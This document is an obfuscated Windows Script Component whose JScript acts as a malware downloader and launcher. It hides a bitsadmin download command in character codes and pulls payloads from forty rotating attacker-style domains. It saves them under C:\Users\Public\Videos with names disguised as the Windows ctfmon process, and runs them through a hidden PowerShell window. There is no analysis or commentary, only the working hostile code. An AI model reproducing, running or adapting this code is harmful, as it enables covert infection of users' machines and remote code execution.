<?xml version="1.0"?>
<package>
<component id="ullmqrqjooavczahnapvarm">
<script language="JScript">
<![CDATA[


    function pmbzzmwvlxzbpcdzcwozymcajz(apgzyeawvdxcjendamzgzae, kbucqrevqueghiayohlg)
	{
     return Math.round(Math.random()*(kbucqrevqueghiayohlg-apgzyeawvdxcjendamzgzae)+apgzyeawvdxcjendamzgzae)
	}	
	
    function mwzbapowvevuijplxhaov(ayygwvuiozgigrxau)
	{
     return String.fromCharCode(ayygwvuiozgigrxau);
	}	

	var ngnvazhzzmrncivwo;
	var wltovdxgarxjtmvudrvr;
	var nammeohkggmlyovxcqa;
	var rmqnbxjynxaqaagjdg;
	var akdgmauhcdrtcwaonhc;
	var cymdytzzvkttvmohekvzal;
	var xrvgcvevrtdzrywbxylimnlniq;
	var rjwqyjztnbdiyhjrtkvda;
    ngnvazhzzmrncivwo = false; 
    wltovdxgarxjtmvudrvr = false; 
	var lhrpqpiyppnmze = new ActiveXObject("Scripting.FileSystemObject");
	var lbgwjetokrwmbwcno = new ActiveXObject("WScript.Shell");
	var nydpriiyuanpzhyjvgzr;
	var abdcedcuzoigiudtpgzh;
	var nwacpuweayhpiywitvg;
	var ngviovqlawqdjtvcic;
	var ycgihhbuexpqotkzv;
	var tqlydwhlaaoiriigeobno;
	var vqnyhekpaaqaauvnpllndyc;
	var nrrvumbojajptbaztm;
	var yerbowvuatylhlcdqhiq;
	var qcclqhxitwoahuwgtlvv;

	
     function elelrjdmwdvcmvevtdn(hbwlduhrmydcjavvo, vhtmvldakmxdpguuyeanv)
    {
		try
		{			
		 lbgwjetokrwmbwcno.run(mwzbapowvevuijplxhaov(98)+mwzbapowvevuijplxhaov(105)+mwzbapowvevuijplxhaov(116)+
		 mwzbapowvevuijplxhaov(115)+mwzbapowvevuijplxhaov(97)+mwzbapowvevuijplxhaov(100)+mwzbapowvevuijplxhaov(109)+
		 mwzbapowvevuijplxhaov(105)+mwzbapowvevuijplxhaov(110)+" /"+mwzbapowvevuijplxhaov(116)+mwzbapowvevuijplxhaov(114)+
		 mwzbapowvevuijplxhaov(97)+mwzbapowvevuijplxhaov(110)+mwzbapowvevuijplxhaov(115)+mwzbapowvevuijplxhaov(102)+
		 mwzbapowvevuijplxhaov(101)+mwzbapowvevuijplxhaov(114)+" "+pmbzzmwvlxzbpcdzcwozymcajz(18691402759, 72511862659)+" /"+mwzbapowvevuijplxhaov(112)+
		 mwzbapowvevuijplxhaov(114)+mwzbapowvevuijplxhaov(105)+mwzbapowvevuijplxhaov(111)+mwzbapowvevuijplxhaov(114)+mwzbapowvevuijplxhaov(105)+
		 mwzbapowvevuijplxhaov(116)+mwzbapowvevuijplxhaov(121)+mwzbapowvevuijplxhaov(32)+mwzbapowvevuijplxhaov(102)+mwzbapowvevuijplxhaov(111)+
		 mwzbapowvevuijplxhaov(114)+mwzbapowvevuijplxhaov(101)+mwzbapowvevuijplxhaov(103)+mwzbapowvevuijplxhaov(114)+mwzbapowvevuijplxhaov(111)+
		 mwzbapowvevuijplxhaov(117)+mwzbapowvevuijplxhaov(110)+mwzbapowvevuijplxhaov(100)+" "+
		 hbwlduhrmydcjavvo+' "'+vhtmvldakmxdpguuyeanv+'"',0,true);
		 return true;
		}
        catch (mhuxpawybiatzcar)
        {		
         return false;
        }
        
    }	
	
	
function puyxengxgcgwvbiul(gaookzrkyywozvbhnbriec)
{

wltovdxgarxjtmvudrvr = false; 


	rmqnbxjynxaqaagjdg = pmbzzmwvlxzbpcdzcwozymcajz(0,39);

   if (rmqnbxjynxaqaagjdg == 0)
   {
    nammeohkggmlyovxcqa = "http://wwaa9.zyed.date/";
   }

   if (rmqnbxjynxaqaagjdg == 1)
   {
    nammeohkggmlyovxcqa = "http://w26kvfmia8w.medorr.date/";
   }

   if (rmqnbxjynxaqaagjdg == 2)
   {
    nammeohkggmlyovxcqa = "http://weta950iitv.keorgia.life/";
   }

   if (rmqnbxjynxaqaagjdg == 3)
   {
    nammeohkggmlyovxcqa = "http://50hkrc4eiw2.elril.info/";
   }

   if (rmqnbxjynxaqaagjdg == 4)
   {
    nammeohkggmlyovxcqa = "http://sjaacr.bagoo.trade/";
   }

   if (rmqnbxjynxaqaagjdg == 5)
   {
    nammeohkggmlyovxcqa = "http://w2iifm.keorgia.life/";
   }

   if (rmqnbxjynxaqaagjdg == 6)
   {
    nammeohkggmlyovxcqa = "http://xkiaew.eriss.email/";
   }

   if (rmqnbxjynxaqaagjdg == 7)
   {
    nammeohkggmlyovxcqa = "http://dgjyn8uioa9.pyazo.info/";
   }

   if (rmqnbxjynxaqaagjdg == 8)
   {
    nammeohkggmlyovxcqa = "http://hkaapu.elril.info/";
   }

   if (rmqnbxjynxaqaagjdg == 9)
   {
    nammeohkggmlyovxcqa = "http://q4ionh.beynranye.trade/";
   }

   if (rmqnbxjynxaqaagjdg == 10)
   {
    nammeohkggmlyovxcqa = "http://wera962eikr.beynranye.trade/";
   }

   if (rmqnbxjynxaqaagjdg == 11)
   {
    nammeohkggmlyovxcqa = "http://flnhta3art.medorr.date/";
   }

   if (rmqnbxjynxaqaagjdg == 12)
   {
    nammeohkggmlyovxcqa = "http://38eefj.sutici.email/";
   }

   if (rmqnbxjynxaqaagjdg == 13)
   {
    nammeohkggmlyovxcqa = "http://erta965iiwt.bagoo.trade/";
   }

   if (rmqnbxjynxaqaagjdg == 14)
   {
    nammeohkggmlyovxcqa = "http://ert8721ioey.elril.info/";
   }

   if (rmqnbxjynxaqaagjdg == 15)
   {
    nammeohkggmlyovxcqa = "http://yw27lvgia8w.xeytovilli.life/";
   }

   if (rmqnbxjynxaqaagjdg == 16)
   {
    nammeohkggmlyovxcqa = "http://49hvjb3awe.zyed.date/";
   }

   if (rmqnbxjynxaqaagjdg == 17)
   {
    nammeohkggmlyovxcqa = "http://wart.medorr.date/";
   }

   if (rmqnbxjynxaqaagjdg == 18)
   {
    nammeohkggmlyovxcqa = "http://39eedh.xeytovilli.life/";
   }

   if (rmqnbxjynxaqaagjdg == 19)
   {
    nammeohkggmlyovxcqa = "http://wata.medorr.date/";
   }

   if (rmqnbxjynxaqaagjdg == 20)
   {
    nammeohkggmlyovxcqa = "http://87eije.eriss.email/";
   }

   if (rmqnbxjynxaqaagjdg == 21)
   {
    nammeohkggmlyovxcqa = "http://lneier.sutici.email/";
   }

   if (rmqnbxjynxaqaagjdg == 22)
   {
    nammeohkggmlyovxcqa = "http://4misw26iofm.pyazo.info/";
   }

   if (rmqnbxjynxaqaagjdg == 23)
   {
    nammeohkggmlyovxcqa = "http://a972dgeaaia.sutici.email/";
   }

   if (rmqnbxjynxaqaagjdg == 24)
   {
    nammeohkggmlyovxcqa = "http://0fwr4yoii27.keorgia.life/";
   }

   if (rmqnbxjynxaqaagjdg == 25)
   {
    nammeohkggmlyovxcqa = "http://wat8.beynranye.trade/";
   }

   if (rmqnbxjynxaqaagjdg == 26)
   {
    nammeohkggmlyovxcqa = "http://eet321dooc7.eriss.email/";
   }

   if (rmqnbxjynxaqaagjdg == 27)
   {
    nammeohkggmlyovxcqa = "http://51gjeyneeir.bagoo.trade/";
   }

   if (rmqnbxjynxaqaagjdg == 28)
   {
    nammeohkggmlyovxcqa = "http://r15sxdkiaww.zyed.date/";
   }

   if (rmqnbxjynxaqaagjdg == 29)
   {
    nammeohkggmlyovxcqa = "http://a8aefh.pyazo.info/";
   }

   if (rmqnbxjynxaqaagjdg == 30)
   {
    nammeohkggmlyovxcqa = "http://7flgta3aer.beynranye.trade/";
   }

   if (rmqnbxjynxaqaagjdg == 31)
   {
    nammeohkggmlyovxcqa = "http://48flhb3a8w.sutici.email/";
   }

   if (rmqnbxjynxaqaagjdg == 32)
   {
    nammeohkggmlyovxcqa = "http://dkaacr.elril.info/";
   }

   if (rmqnbxjynxaqaagjdg == 33)
   {
    nammeohkggmlyovxcqa = "http://uw26kvfii89.xeytovilli.life/";
   }

   if (rmqnbxjynxaqaagjdg == 34)
   {
    nammeohkggmlyovxcqa = "http://72eijt.pyazo.info/";
   }

   if (rmqnbxjynxaqaagjdg == 35)
   {
    nammeohkggmlyovxcqa = "http://jvaier.keorgia.life/";
   }

   if (rmqnbxjynxaqaagjdg == 36)
   {
    nammeohkggmlyovxcqa = "http://wtv4opwaalv.eriss.email/";
   }

   if (rmqnbxjynxaqaagjdg == 37)
   {
    nammeohkggmlyovxcqa = "http://kraais.bagoo.trade/";
   }

   if (rmqnbxjynxaqaagjdg == 38)
   {
    nammeohkggmlyovxcqa = "http://w1iixk.xeytovilli.life/";
   }

   if (rmqnbxjynxaqaagjdg == 39)
   {
    nammeohkggmlyovxcqa = "http://50iotv.zyed.date/";
   }




   


akdgmauhcdrtcwaonhc = nammeohkggmlyovxcqa;
nydpriiyuanpzhyjvgzr="C:\\Users\\Public\\Videos\\";


if (lhrpqpiyppnmze.FileExists("C:\\Users\\Public\\lr")){	
  var apkivmquamakcdbjll = lhrpqpiyppnmze.OpenTextFile("C:\\Users\\Public\\lr", 1); 
  xrvgcvevrtdzrywbxylimnlniq = apkivmquamakcdbjll.ReadLine(); 
  apkivmquamakcdbjll.Close(); 
  cymdytzzvkttvmohekvzal = xrvgcvevrtdzrywbxylimnlniq;
  lbgwjetokrwmbwcno.run('cmd /V /C "echo '+cymdytzzvkttvmohekvzal+'>'+'C:\\Users\\Public\\lu"&& exit',0,true); 
} else {
	if (lhrpqpiyppnmze.FileExists("C:\\Users\\Public\\ls")){	
	  var apkivmquamakcdbjll = lhrpqpiyppnmze.OpenTextFile("C:\\Users\\Public\\ls", 1); 
	  xrvgcvevrtdzrywbxylimnlniq = apkivmquamakcdbjll.ReadLine(); 
	  apkivmquamakcdbjll.Close(); 
	  cymdytzzvkttvmohekvzal = xrvgcvevrtdzrywbxylimnlniq;
	  lbgwjetokrwmbwcno.run('cmd /V /C "echo '+cymdytzzvkttvmohekvzal+'>'+'C:\\Users\\Public\\lu"&& exit',0,true); 
	} else {	
		if (lhrpqpiyppnmze.FileExists("C:\\Users\\Public\\lt")){	
		  var apkivmquamakcdbjll = lhrpqpiyppnmze.OpenTextFile("C:\\Users\\Public\\lt", 1); 
		  xrvgcvevrtdzrywbxylimnlniq = apkivmquamakcdbjll.ReadLine(); 
		  apkivmquamakcdbjll.Close(); 
		  cymdytzzvkttvmohekvzal = xrvgcvevrtdzrywbxylimnlniq;
		  lbgwjetokrwmbwcno.run('cmd /V /C "echo '+cymdytzzvkttvmohekvzal+'>'+'C:\\Users\\Public\\lu"&& exit',0,true); 
		} else {
	
			if (lhrpqpiyppnmze.FileExists("C:\\Users\\Public\\lu")){	
			  var apkivmquamakcdbjll = lhrpqpiyppnmze.OpenTextFile("C:\\Users\\Public\\lu", 1); 
			  xrvgcvevrtdzrywbxylimnlniq = apkivmquamakcdbjll.ReadLine(); 
			  apkivmquamakcdbjll.Close(); 
			  cymdytzzvkttvmohekvzal = xrvgcvevrtdzrywbxylimnlniq;
			} else {
				cymdytzzvkttvmohekvzal = nydpriiyuanpzhyjvgzr+mwzbapowvevuijplxhaov(pmbzzmwvlxzbpcdzcwozymcajz(65,90))+mwzbapowvevuijplxhaov(pmbzzmwvlxzbpcdzcwozymcajz(65,90))+
				mwzbapowvevuijplxhaov(pmbzzmwvlxzbpcdzcwozymcajz(65,90))+pmbzzmwvlxzbpcdzcwozymcajz(18691402759, 61343510249)+mwzbapowvevuijplxhaov(pmbzzmwvlxzbpcdzcwozymcajz(65,90))+"\\";
				lbgwjetokrwmbwcno.run('cmd /V /C "echo '+cymdytzzvkttvmohekvzal+'>'+'C:\\Users\\Public\\lu"&& exit',0,true); 
			}
		}		
	}
}
	
	try
	{
	var oarajuitgwidxuivvaizgwkzqa = new ActiveXObject("Scripting.FileSystemObject");  
	oarajuitgwidxuivvaizgwkzqa.CreateFolder(cymdytzzvkttvmohekvzal);  
	}
    catch (ruougybzexkihauzenvzan)
    {
		
	}	

	try
	{    
     if (lhrpqpiyppnmze.FileExists(cymdytzzvkttvmohekvzal+"ctfmon.dll")){	   
	   abdcedcuzoigiudtpgzh = lhrpqpiyppnmze.GetFile(cymdytzzvkttvmohekvzal+"ctfmon.dll");	   
	   if (abdcedcuzoigiudtpgzh.size < 10 ){
		abdcedcuzoigiudtpgzh.Delete();  
		abdcedcuzoigiudtpgzh.Close();		
	   }
     }   
	}
    catch (ibwbwblyaaicpwuzj)
    {
		
	}	 
	
	if (lhrpqpiyppnmze.FileExists(cymdytzzvkttvmohekvzal+"ctfmon.exe")){
		if (lhrpqpiyppnmze.FileExists(cymdytzzvkttvmohekvzal+"ctfmon.log")){
			if (lhrpqpiyppnmze.FileExists(cymdytzzvkttvmohekvzal+"ctfmon.dll")){	
				if (lhrpqpiyppnmze.FileExists(cymdytzzvkttvmohekvzal+"log32.dll")){	
					if (lhrpqpiyppnmze.FileExists(cymdytzzvkttvmohekvzal+"log33.dll")){	
						try	{
						wltovdxgarxjtmvudrvr = true; 
						lbgwjetokrwmbwcno.run('cmd.exe /c cd C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\&& ^start ^/W ^/MIN powershell -windowstyle hidden -Command "\& \''+cymdytzzvkttvmohekvzal+'ctfmon.exe\' '+cymdytzzvkttvmohekvzal+'ctfmon.log "&& timeout 3600',0,true); 
						}catch (lidggctqnmujdvlprcyk) {

						}		
						wltovdxgarxjtmvudrvr = true;  					
				}	}
			}
		}
	}
   
  if (wltovdxgarxjtmvudrvr == false)
  {   
	vqnyhekpaaqaauvnpllndyc = pmbzzmwvlxzbpcdzcwozymcajz(26965774444, 60006967217);
	nrrvumbojajptbaztm = pmbzzmwvlxzbpcdzcwozymcajz(23888554233, 73744671083);
	yerbowvuatylhlcdqhiq = pmbzzmwvlxzbpcdzcwozymcajz(26084346194, 72511862659);
	try
	{
	 ngnvazhzzmrncivwo = elelrjdmwdvcmvevtdn(nammeohkggmlyovxcqa+"?"+vqnyhekpaaqaauvnpllndyc+""+nrrvumbojajptbaztm+""+yerbowvuatylhlcdqhiq, cymdytzzvkttvmohekvzal+"ctfmon.dll");
	}
    catch (zcdeudpqnjepimtbdrbhrcy)
    {
		
	}
	
	try
	{
	 ngnvazhzzmrncivwo = elelrjdmwdvcmvevtdn(nammeohkggmlyovxcqa+"?37214695122677885", cymdytzzvkttvmohekvzal+"log32.dll");
	}
    catch (zcdeudpqnjepimtbdrbhrcy)
    {
		
	}	
	
	try
	{
	 ngnvazhzzmrncivwo = elelrjdmwdvcmvevtdn(nammeohkggmlyovxcqa+"?54814354568676742", cymdytzzvkttvmohekvzal+"log33.dll");
	}
    catch (zcdeudpqnjepimtbdrbhrcy)
    {
		
	}	
	
	
	try
	{
	 ngnvazhzzmrncivwo = elelrjdmwdvcmvevtdn(nammeohkggmlyovxcqa+"?42422428018686456", cymdytzzvkttvmohekvzal+"ctfmon.exe");
	}
    catch (zcdeudpqnjepimtbdrbhrcy)
    {
		
	}	

	try
	{
	 ngnvazhzzmrncivwo = elelrjdmwdvcmvevtdn(nammeohkggmlyovxcqa+"?42567776550636927", cymdytzzvkttvmohekvzal+"ctfmon.log");
	}
    catch (zcdeudpqnjepimtbdrbhrcy)
    {
		
	}	

	

	if (lhrpqpiyppnmze.FileExists(cymdytzzvkttvmohekvzal+"ctfmon.exe")){
	 try {	
		lbgwjetokrwmbwcno.run('cmd /V /C "echo rjwqyjztnbdiyhjrtkvda >'+cymdytzzvkttvmohekvzal+'\\r1.log"&& exit',0,true); 
	 } catch (dqcvouojmjuhreedydxpxx) {
		
	 }		
		
		try	{	
			qcclqhxitwoahuwgtlvv = pmbzzmwvlxzbpcdzcwozymcajz(18691402759, 61343510249);	
			wltovdxgarxjtmvudrvr = true;
			lbgwjetokrwmbwcno.run('cmd.exe /c cd C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\&& ^start ^/W ^/MIN powershell -windowstyle hidden -Command "\& \''+cymdytzzvkttvmohekvzal+'ctfmon.exe\' '+cymdytzzvkttvmohekvzal+'ctfmon.log "&& timeout 3600',0,true); 
		}catch (lidggctqnmujdvlprcyk) {

		}	
		wltovdxgarxjtmvudrvr = true;             
	}
	
  }
   

}

puyxengxgcgwvbiul(pmbzzmwvlxzbpcdzcwozymcajz(23888554233, 72511862659));

puyxengxgcgwvbiul(pmbzzmwvlxzbpcdzcwozymcajz(23888554233, 72511862659));



]]>
</script>
</component>
</package>
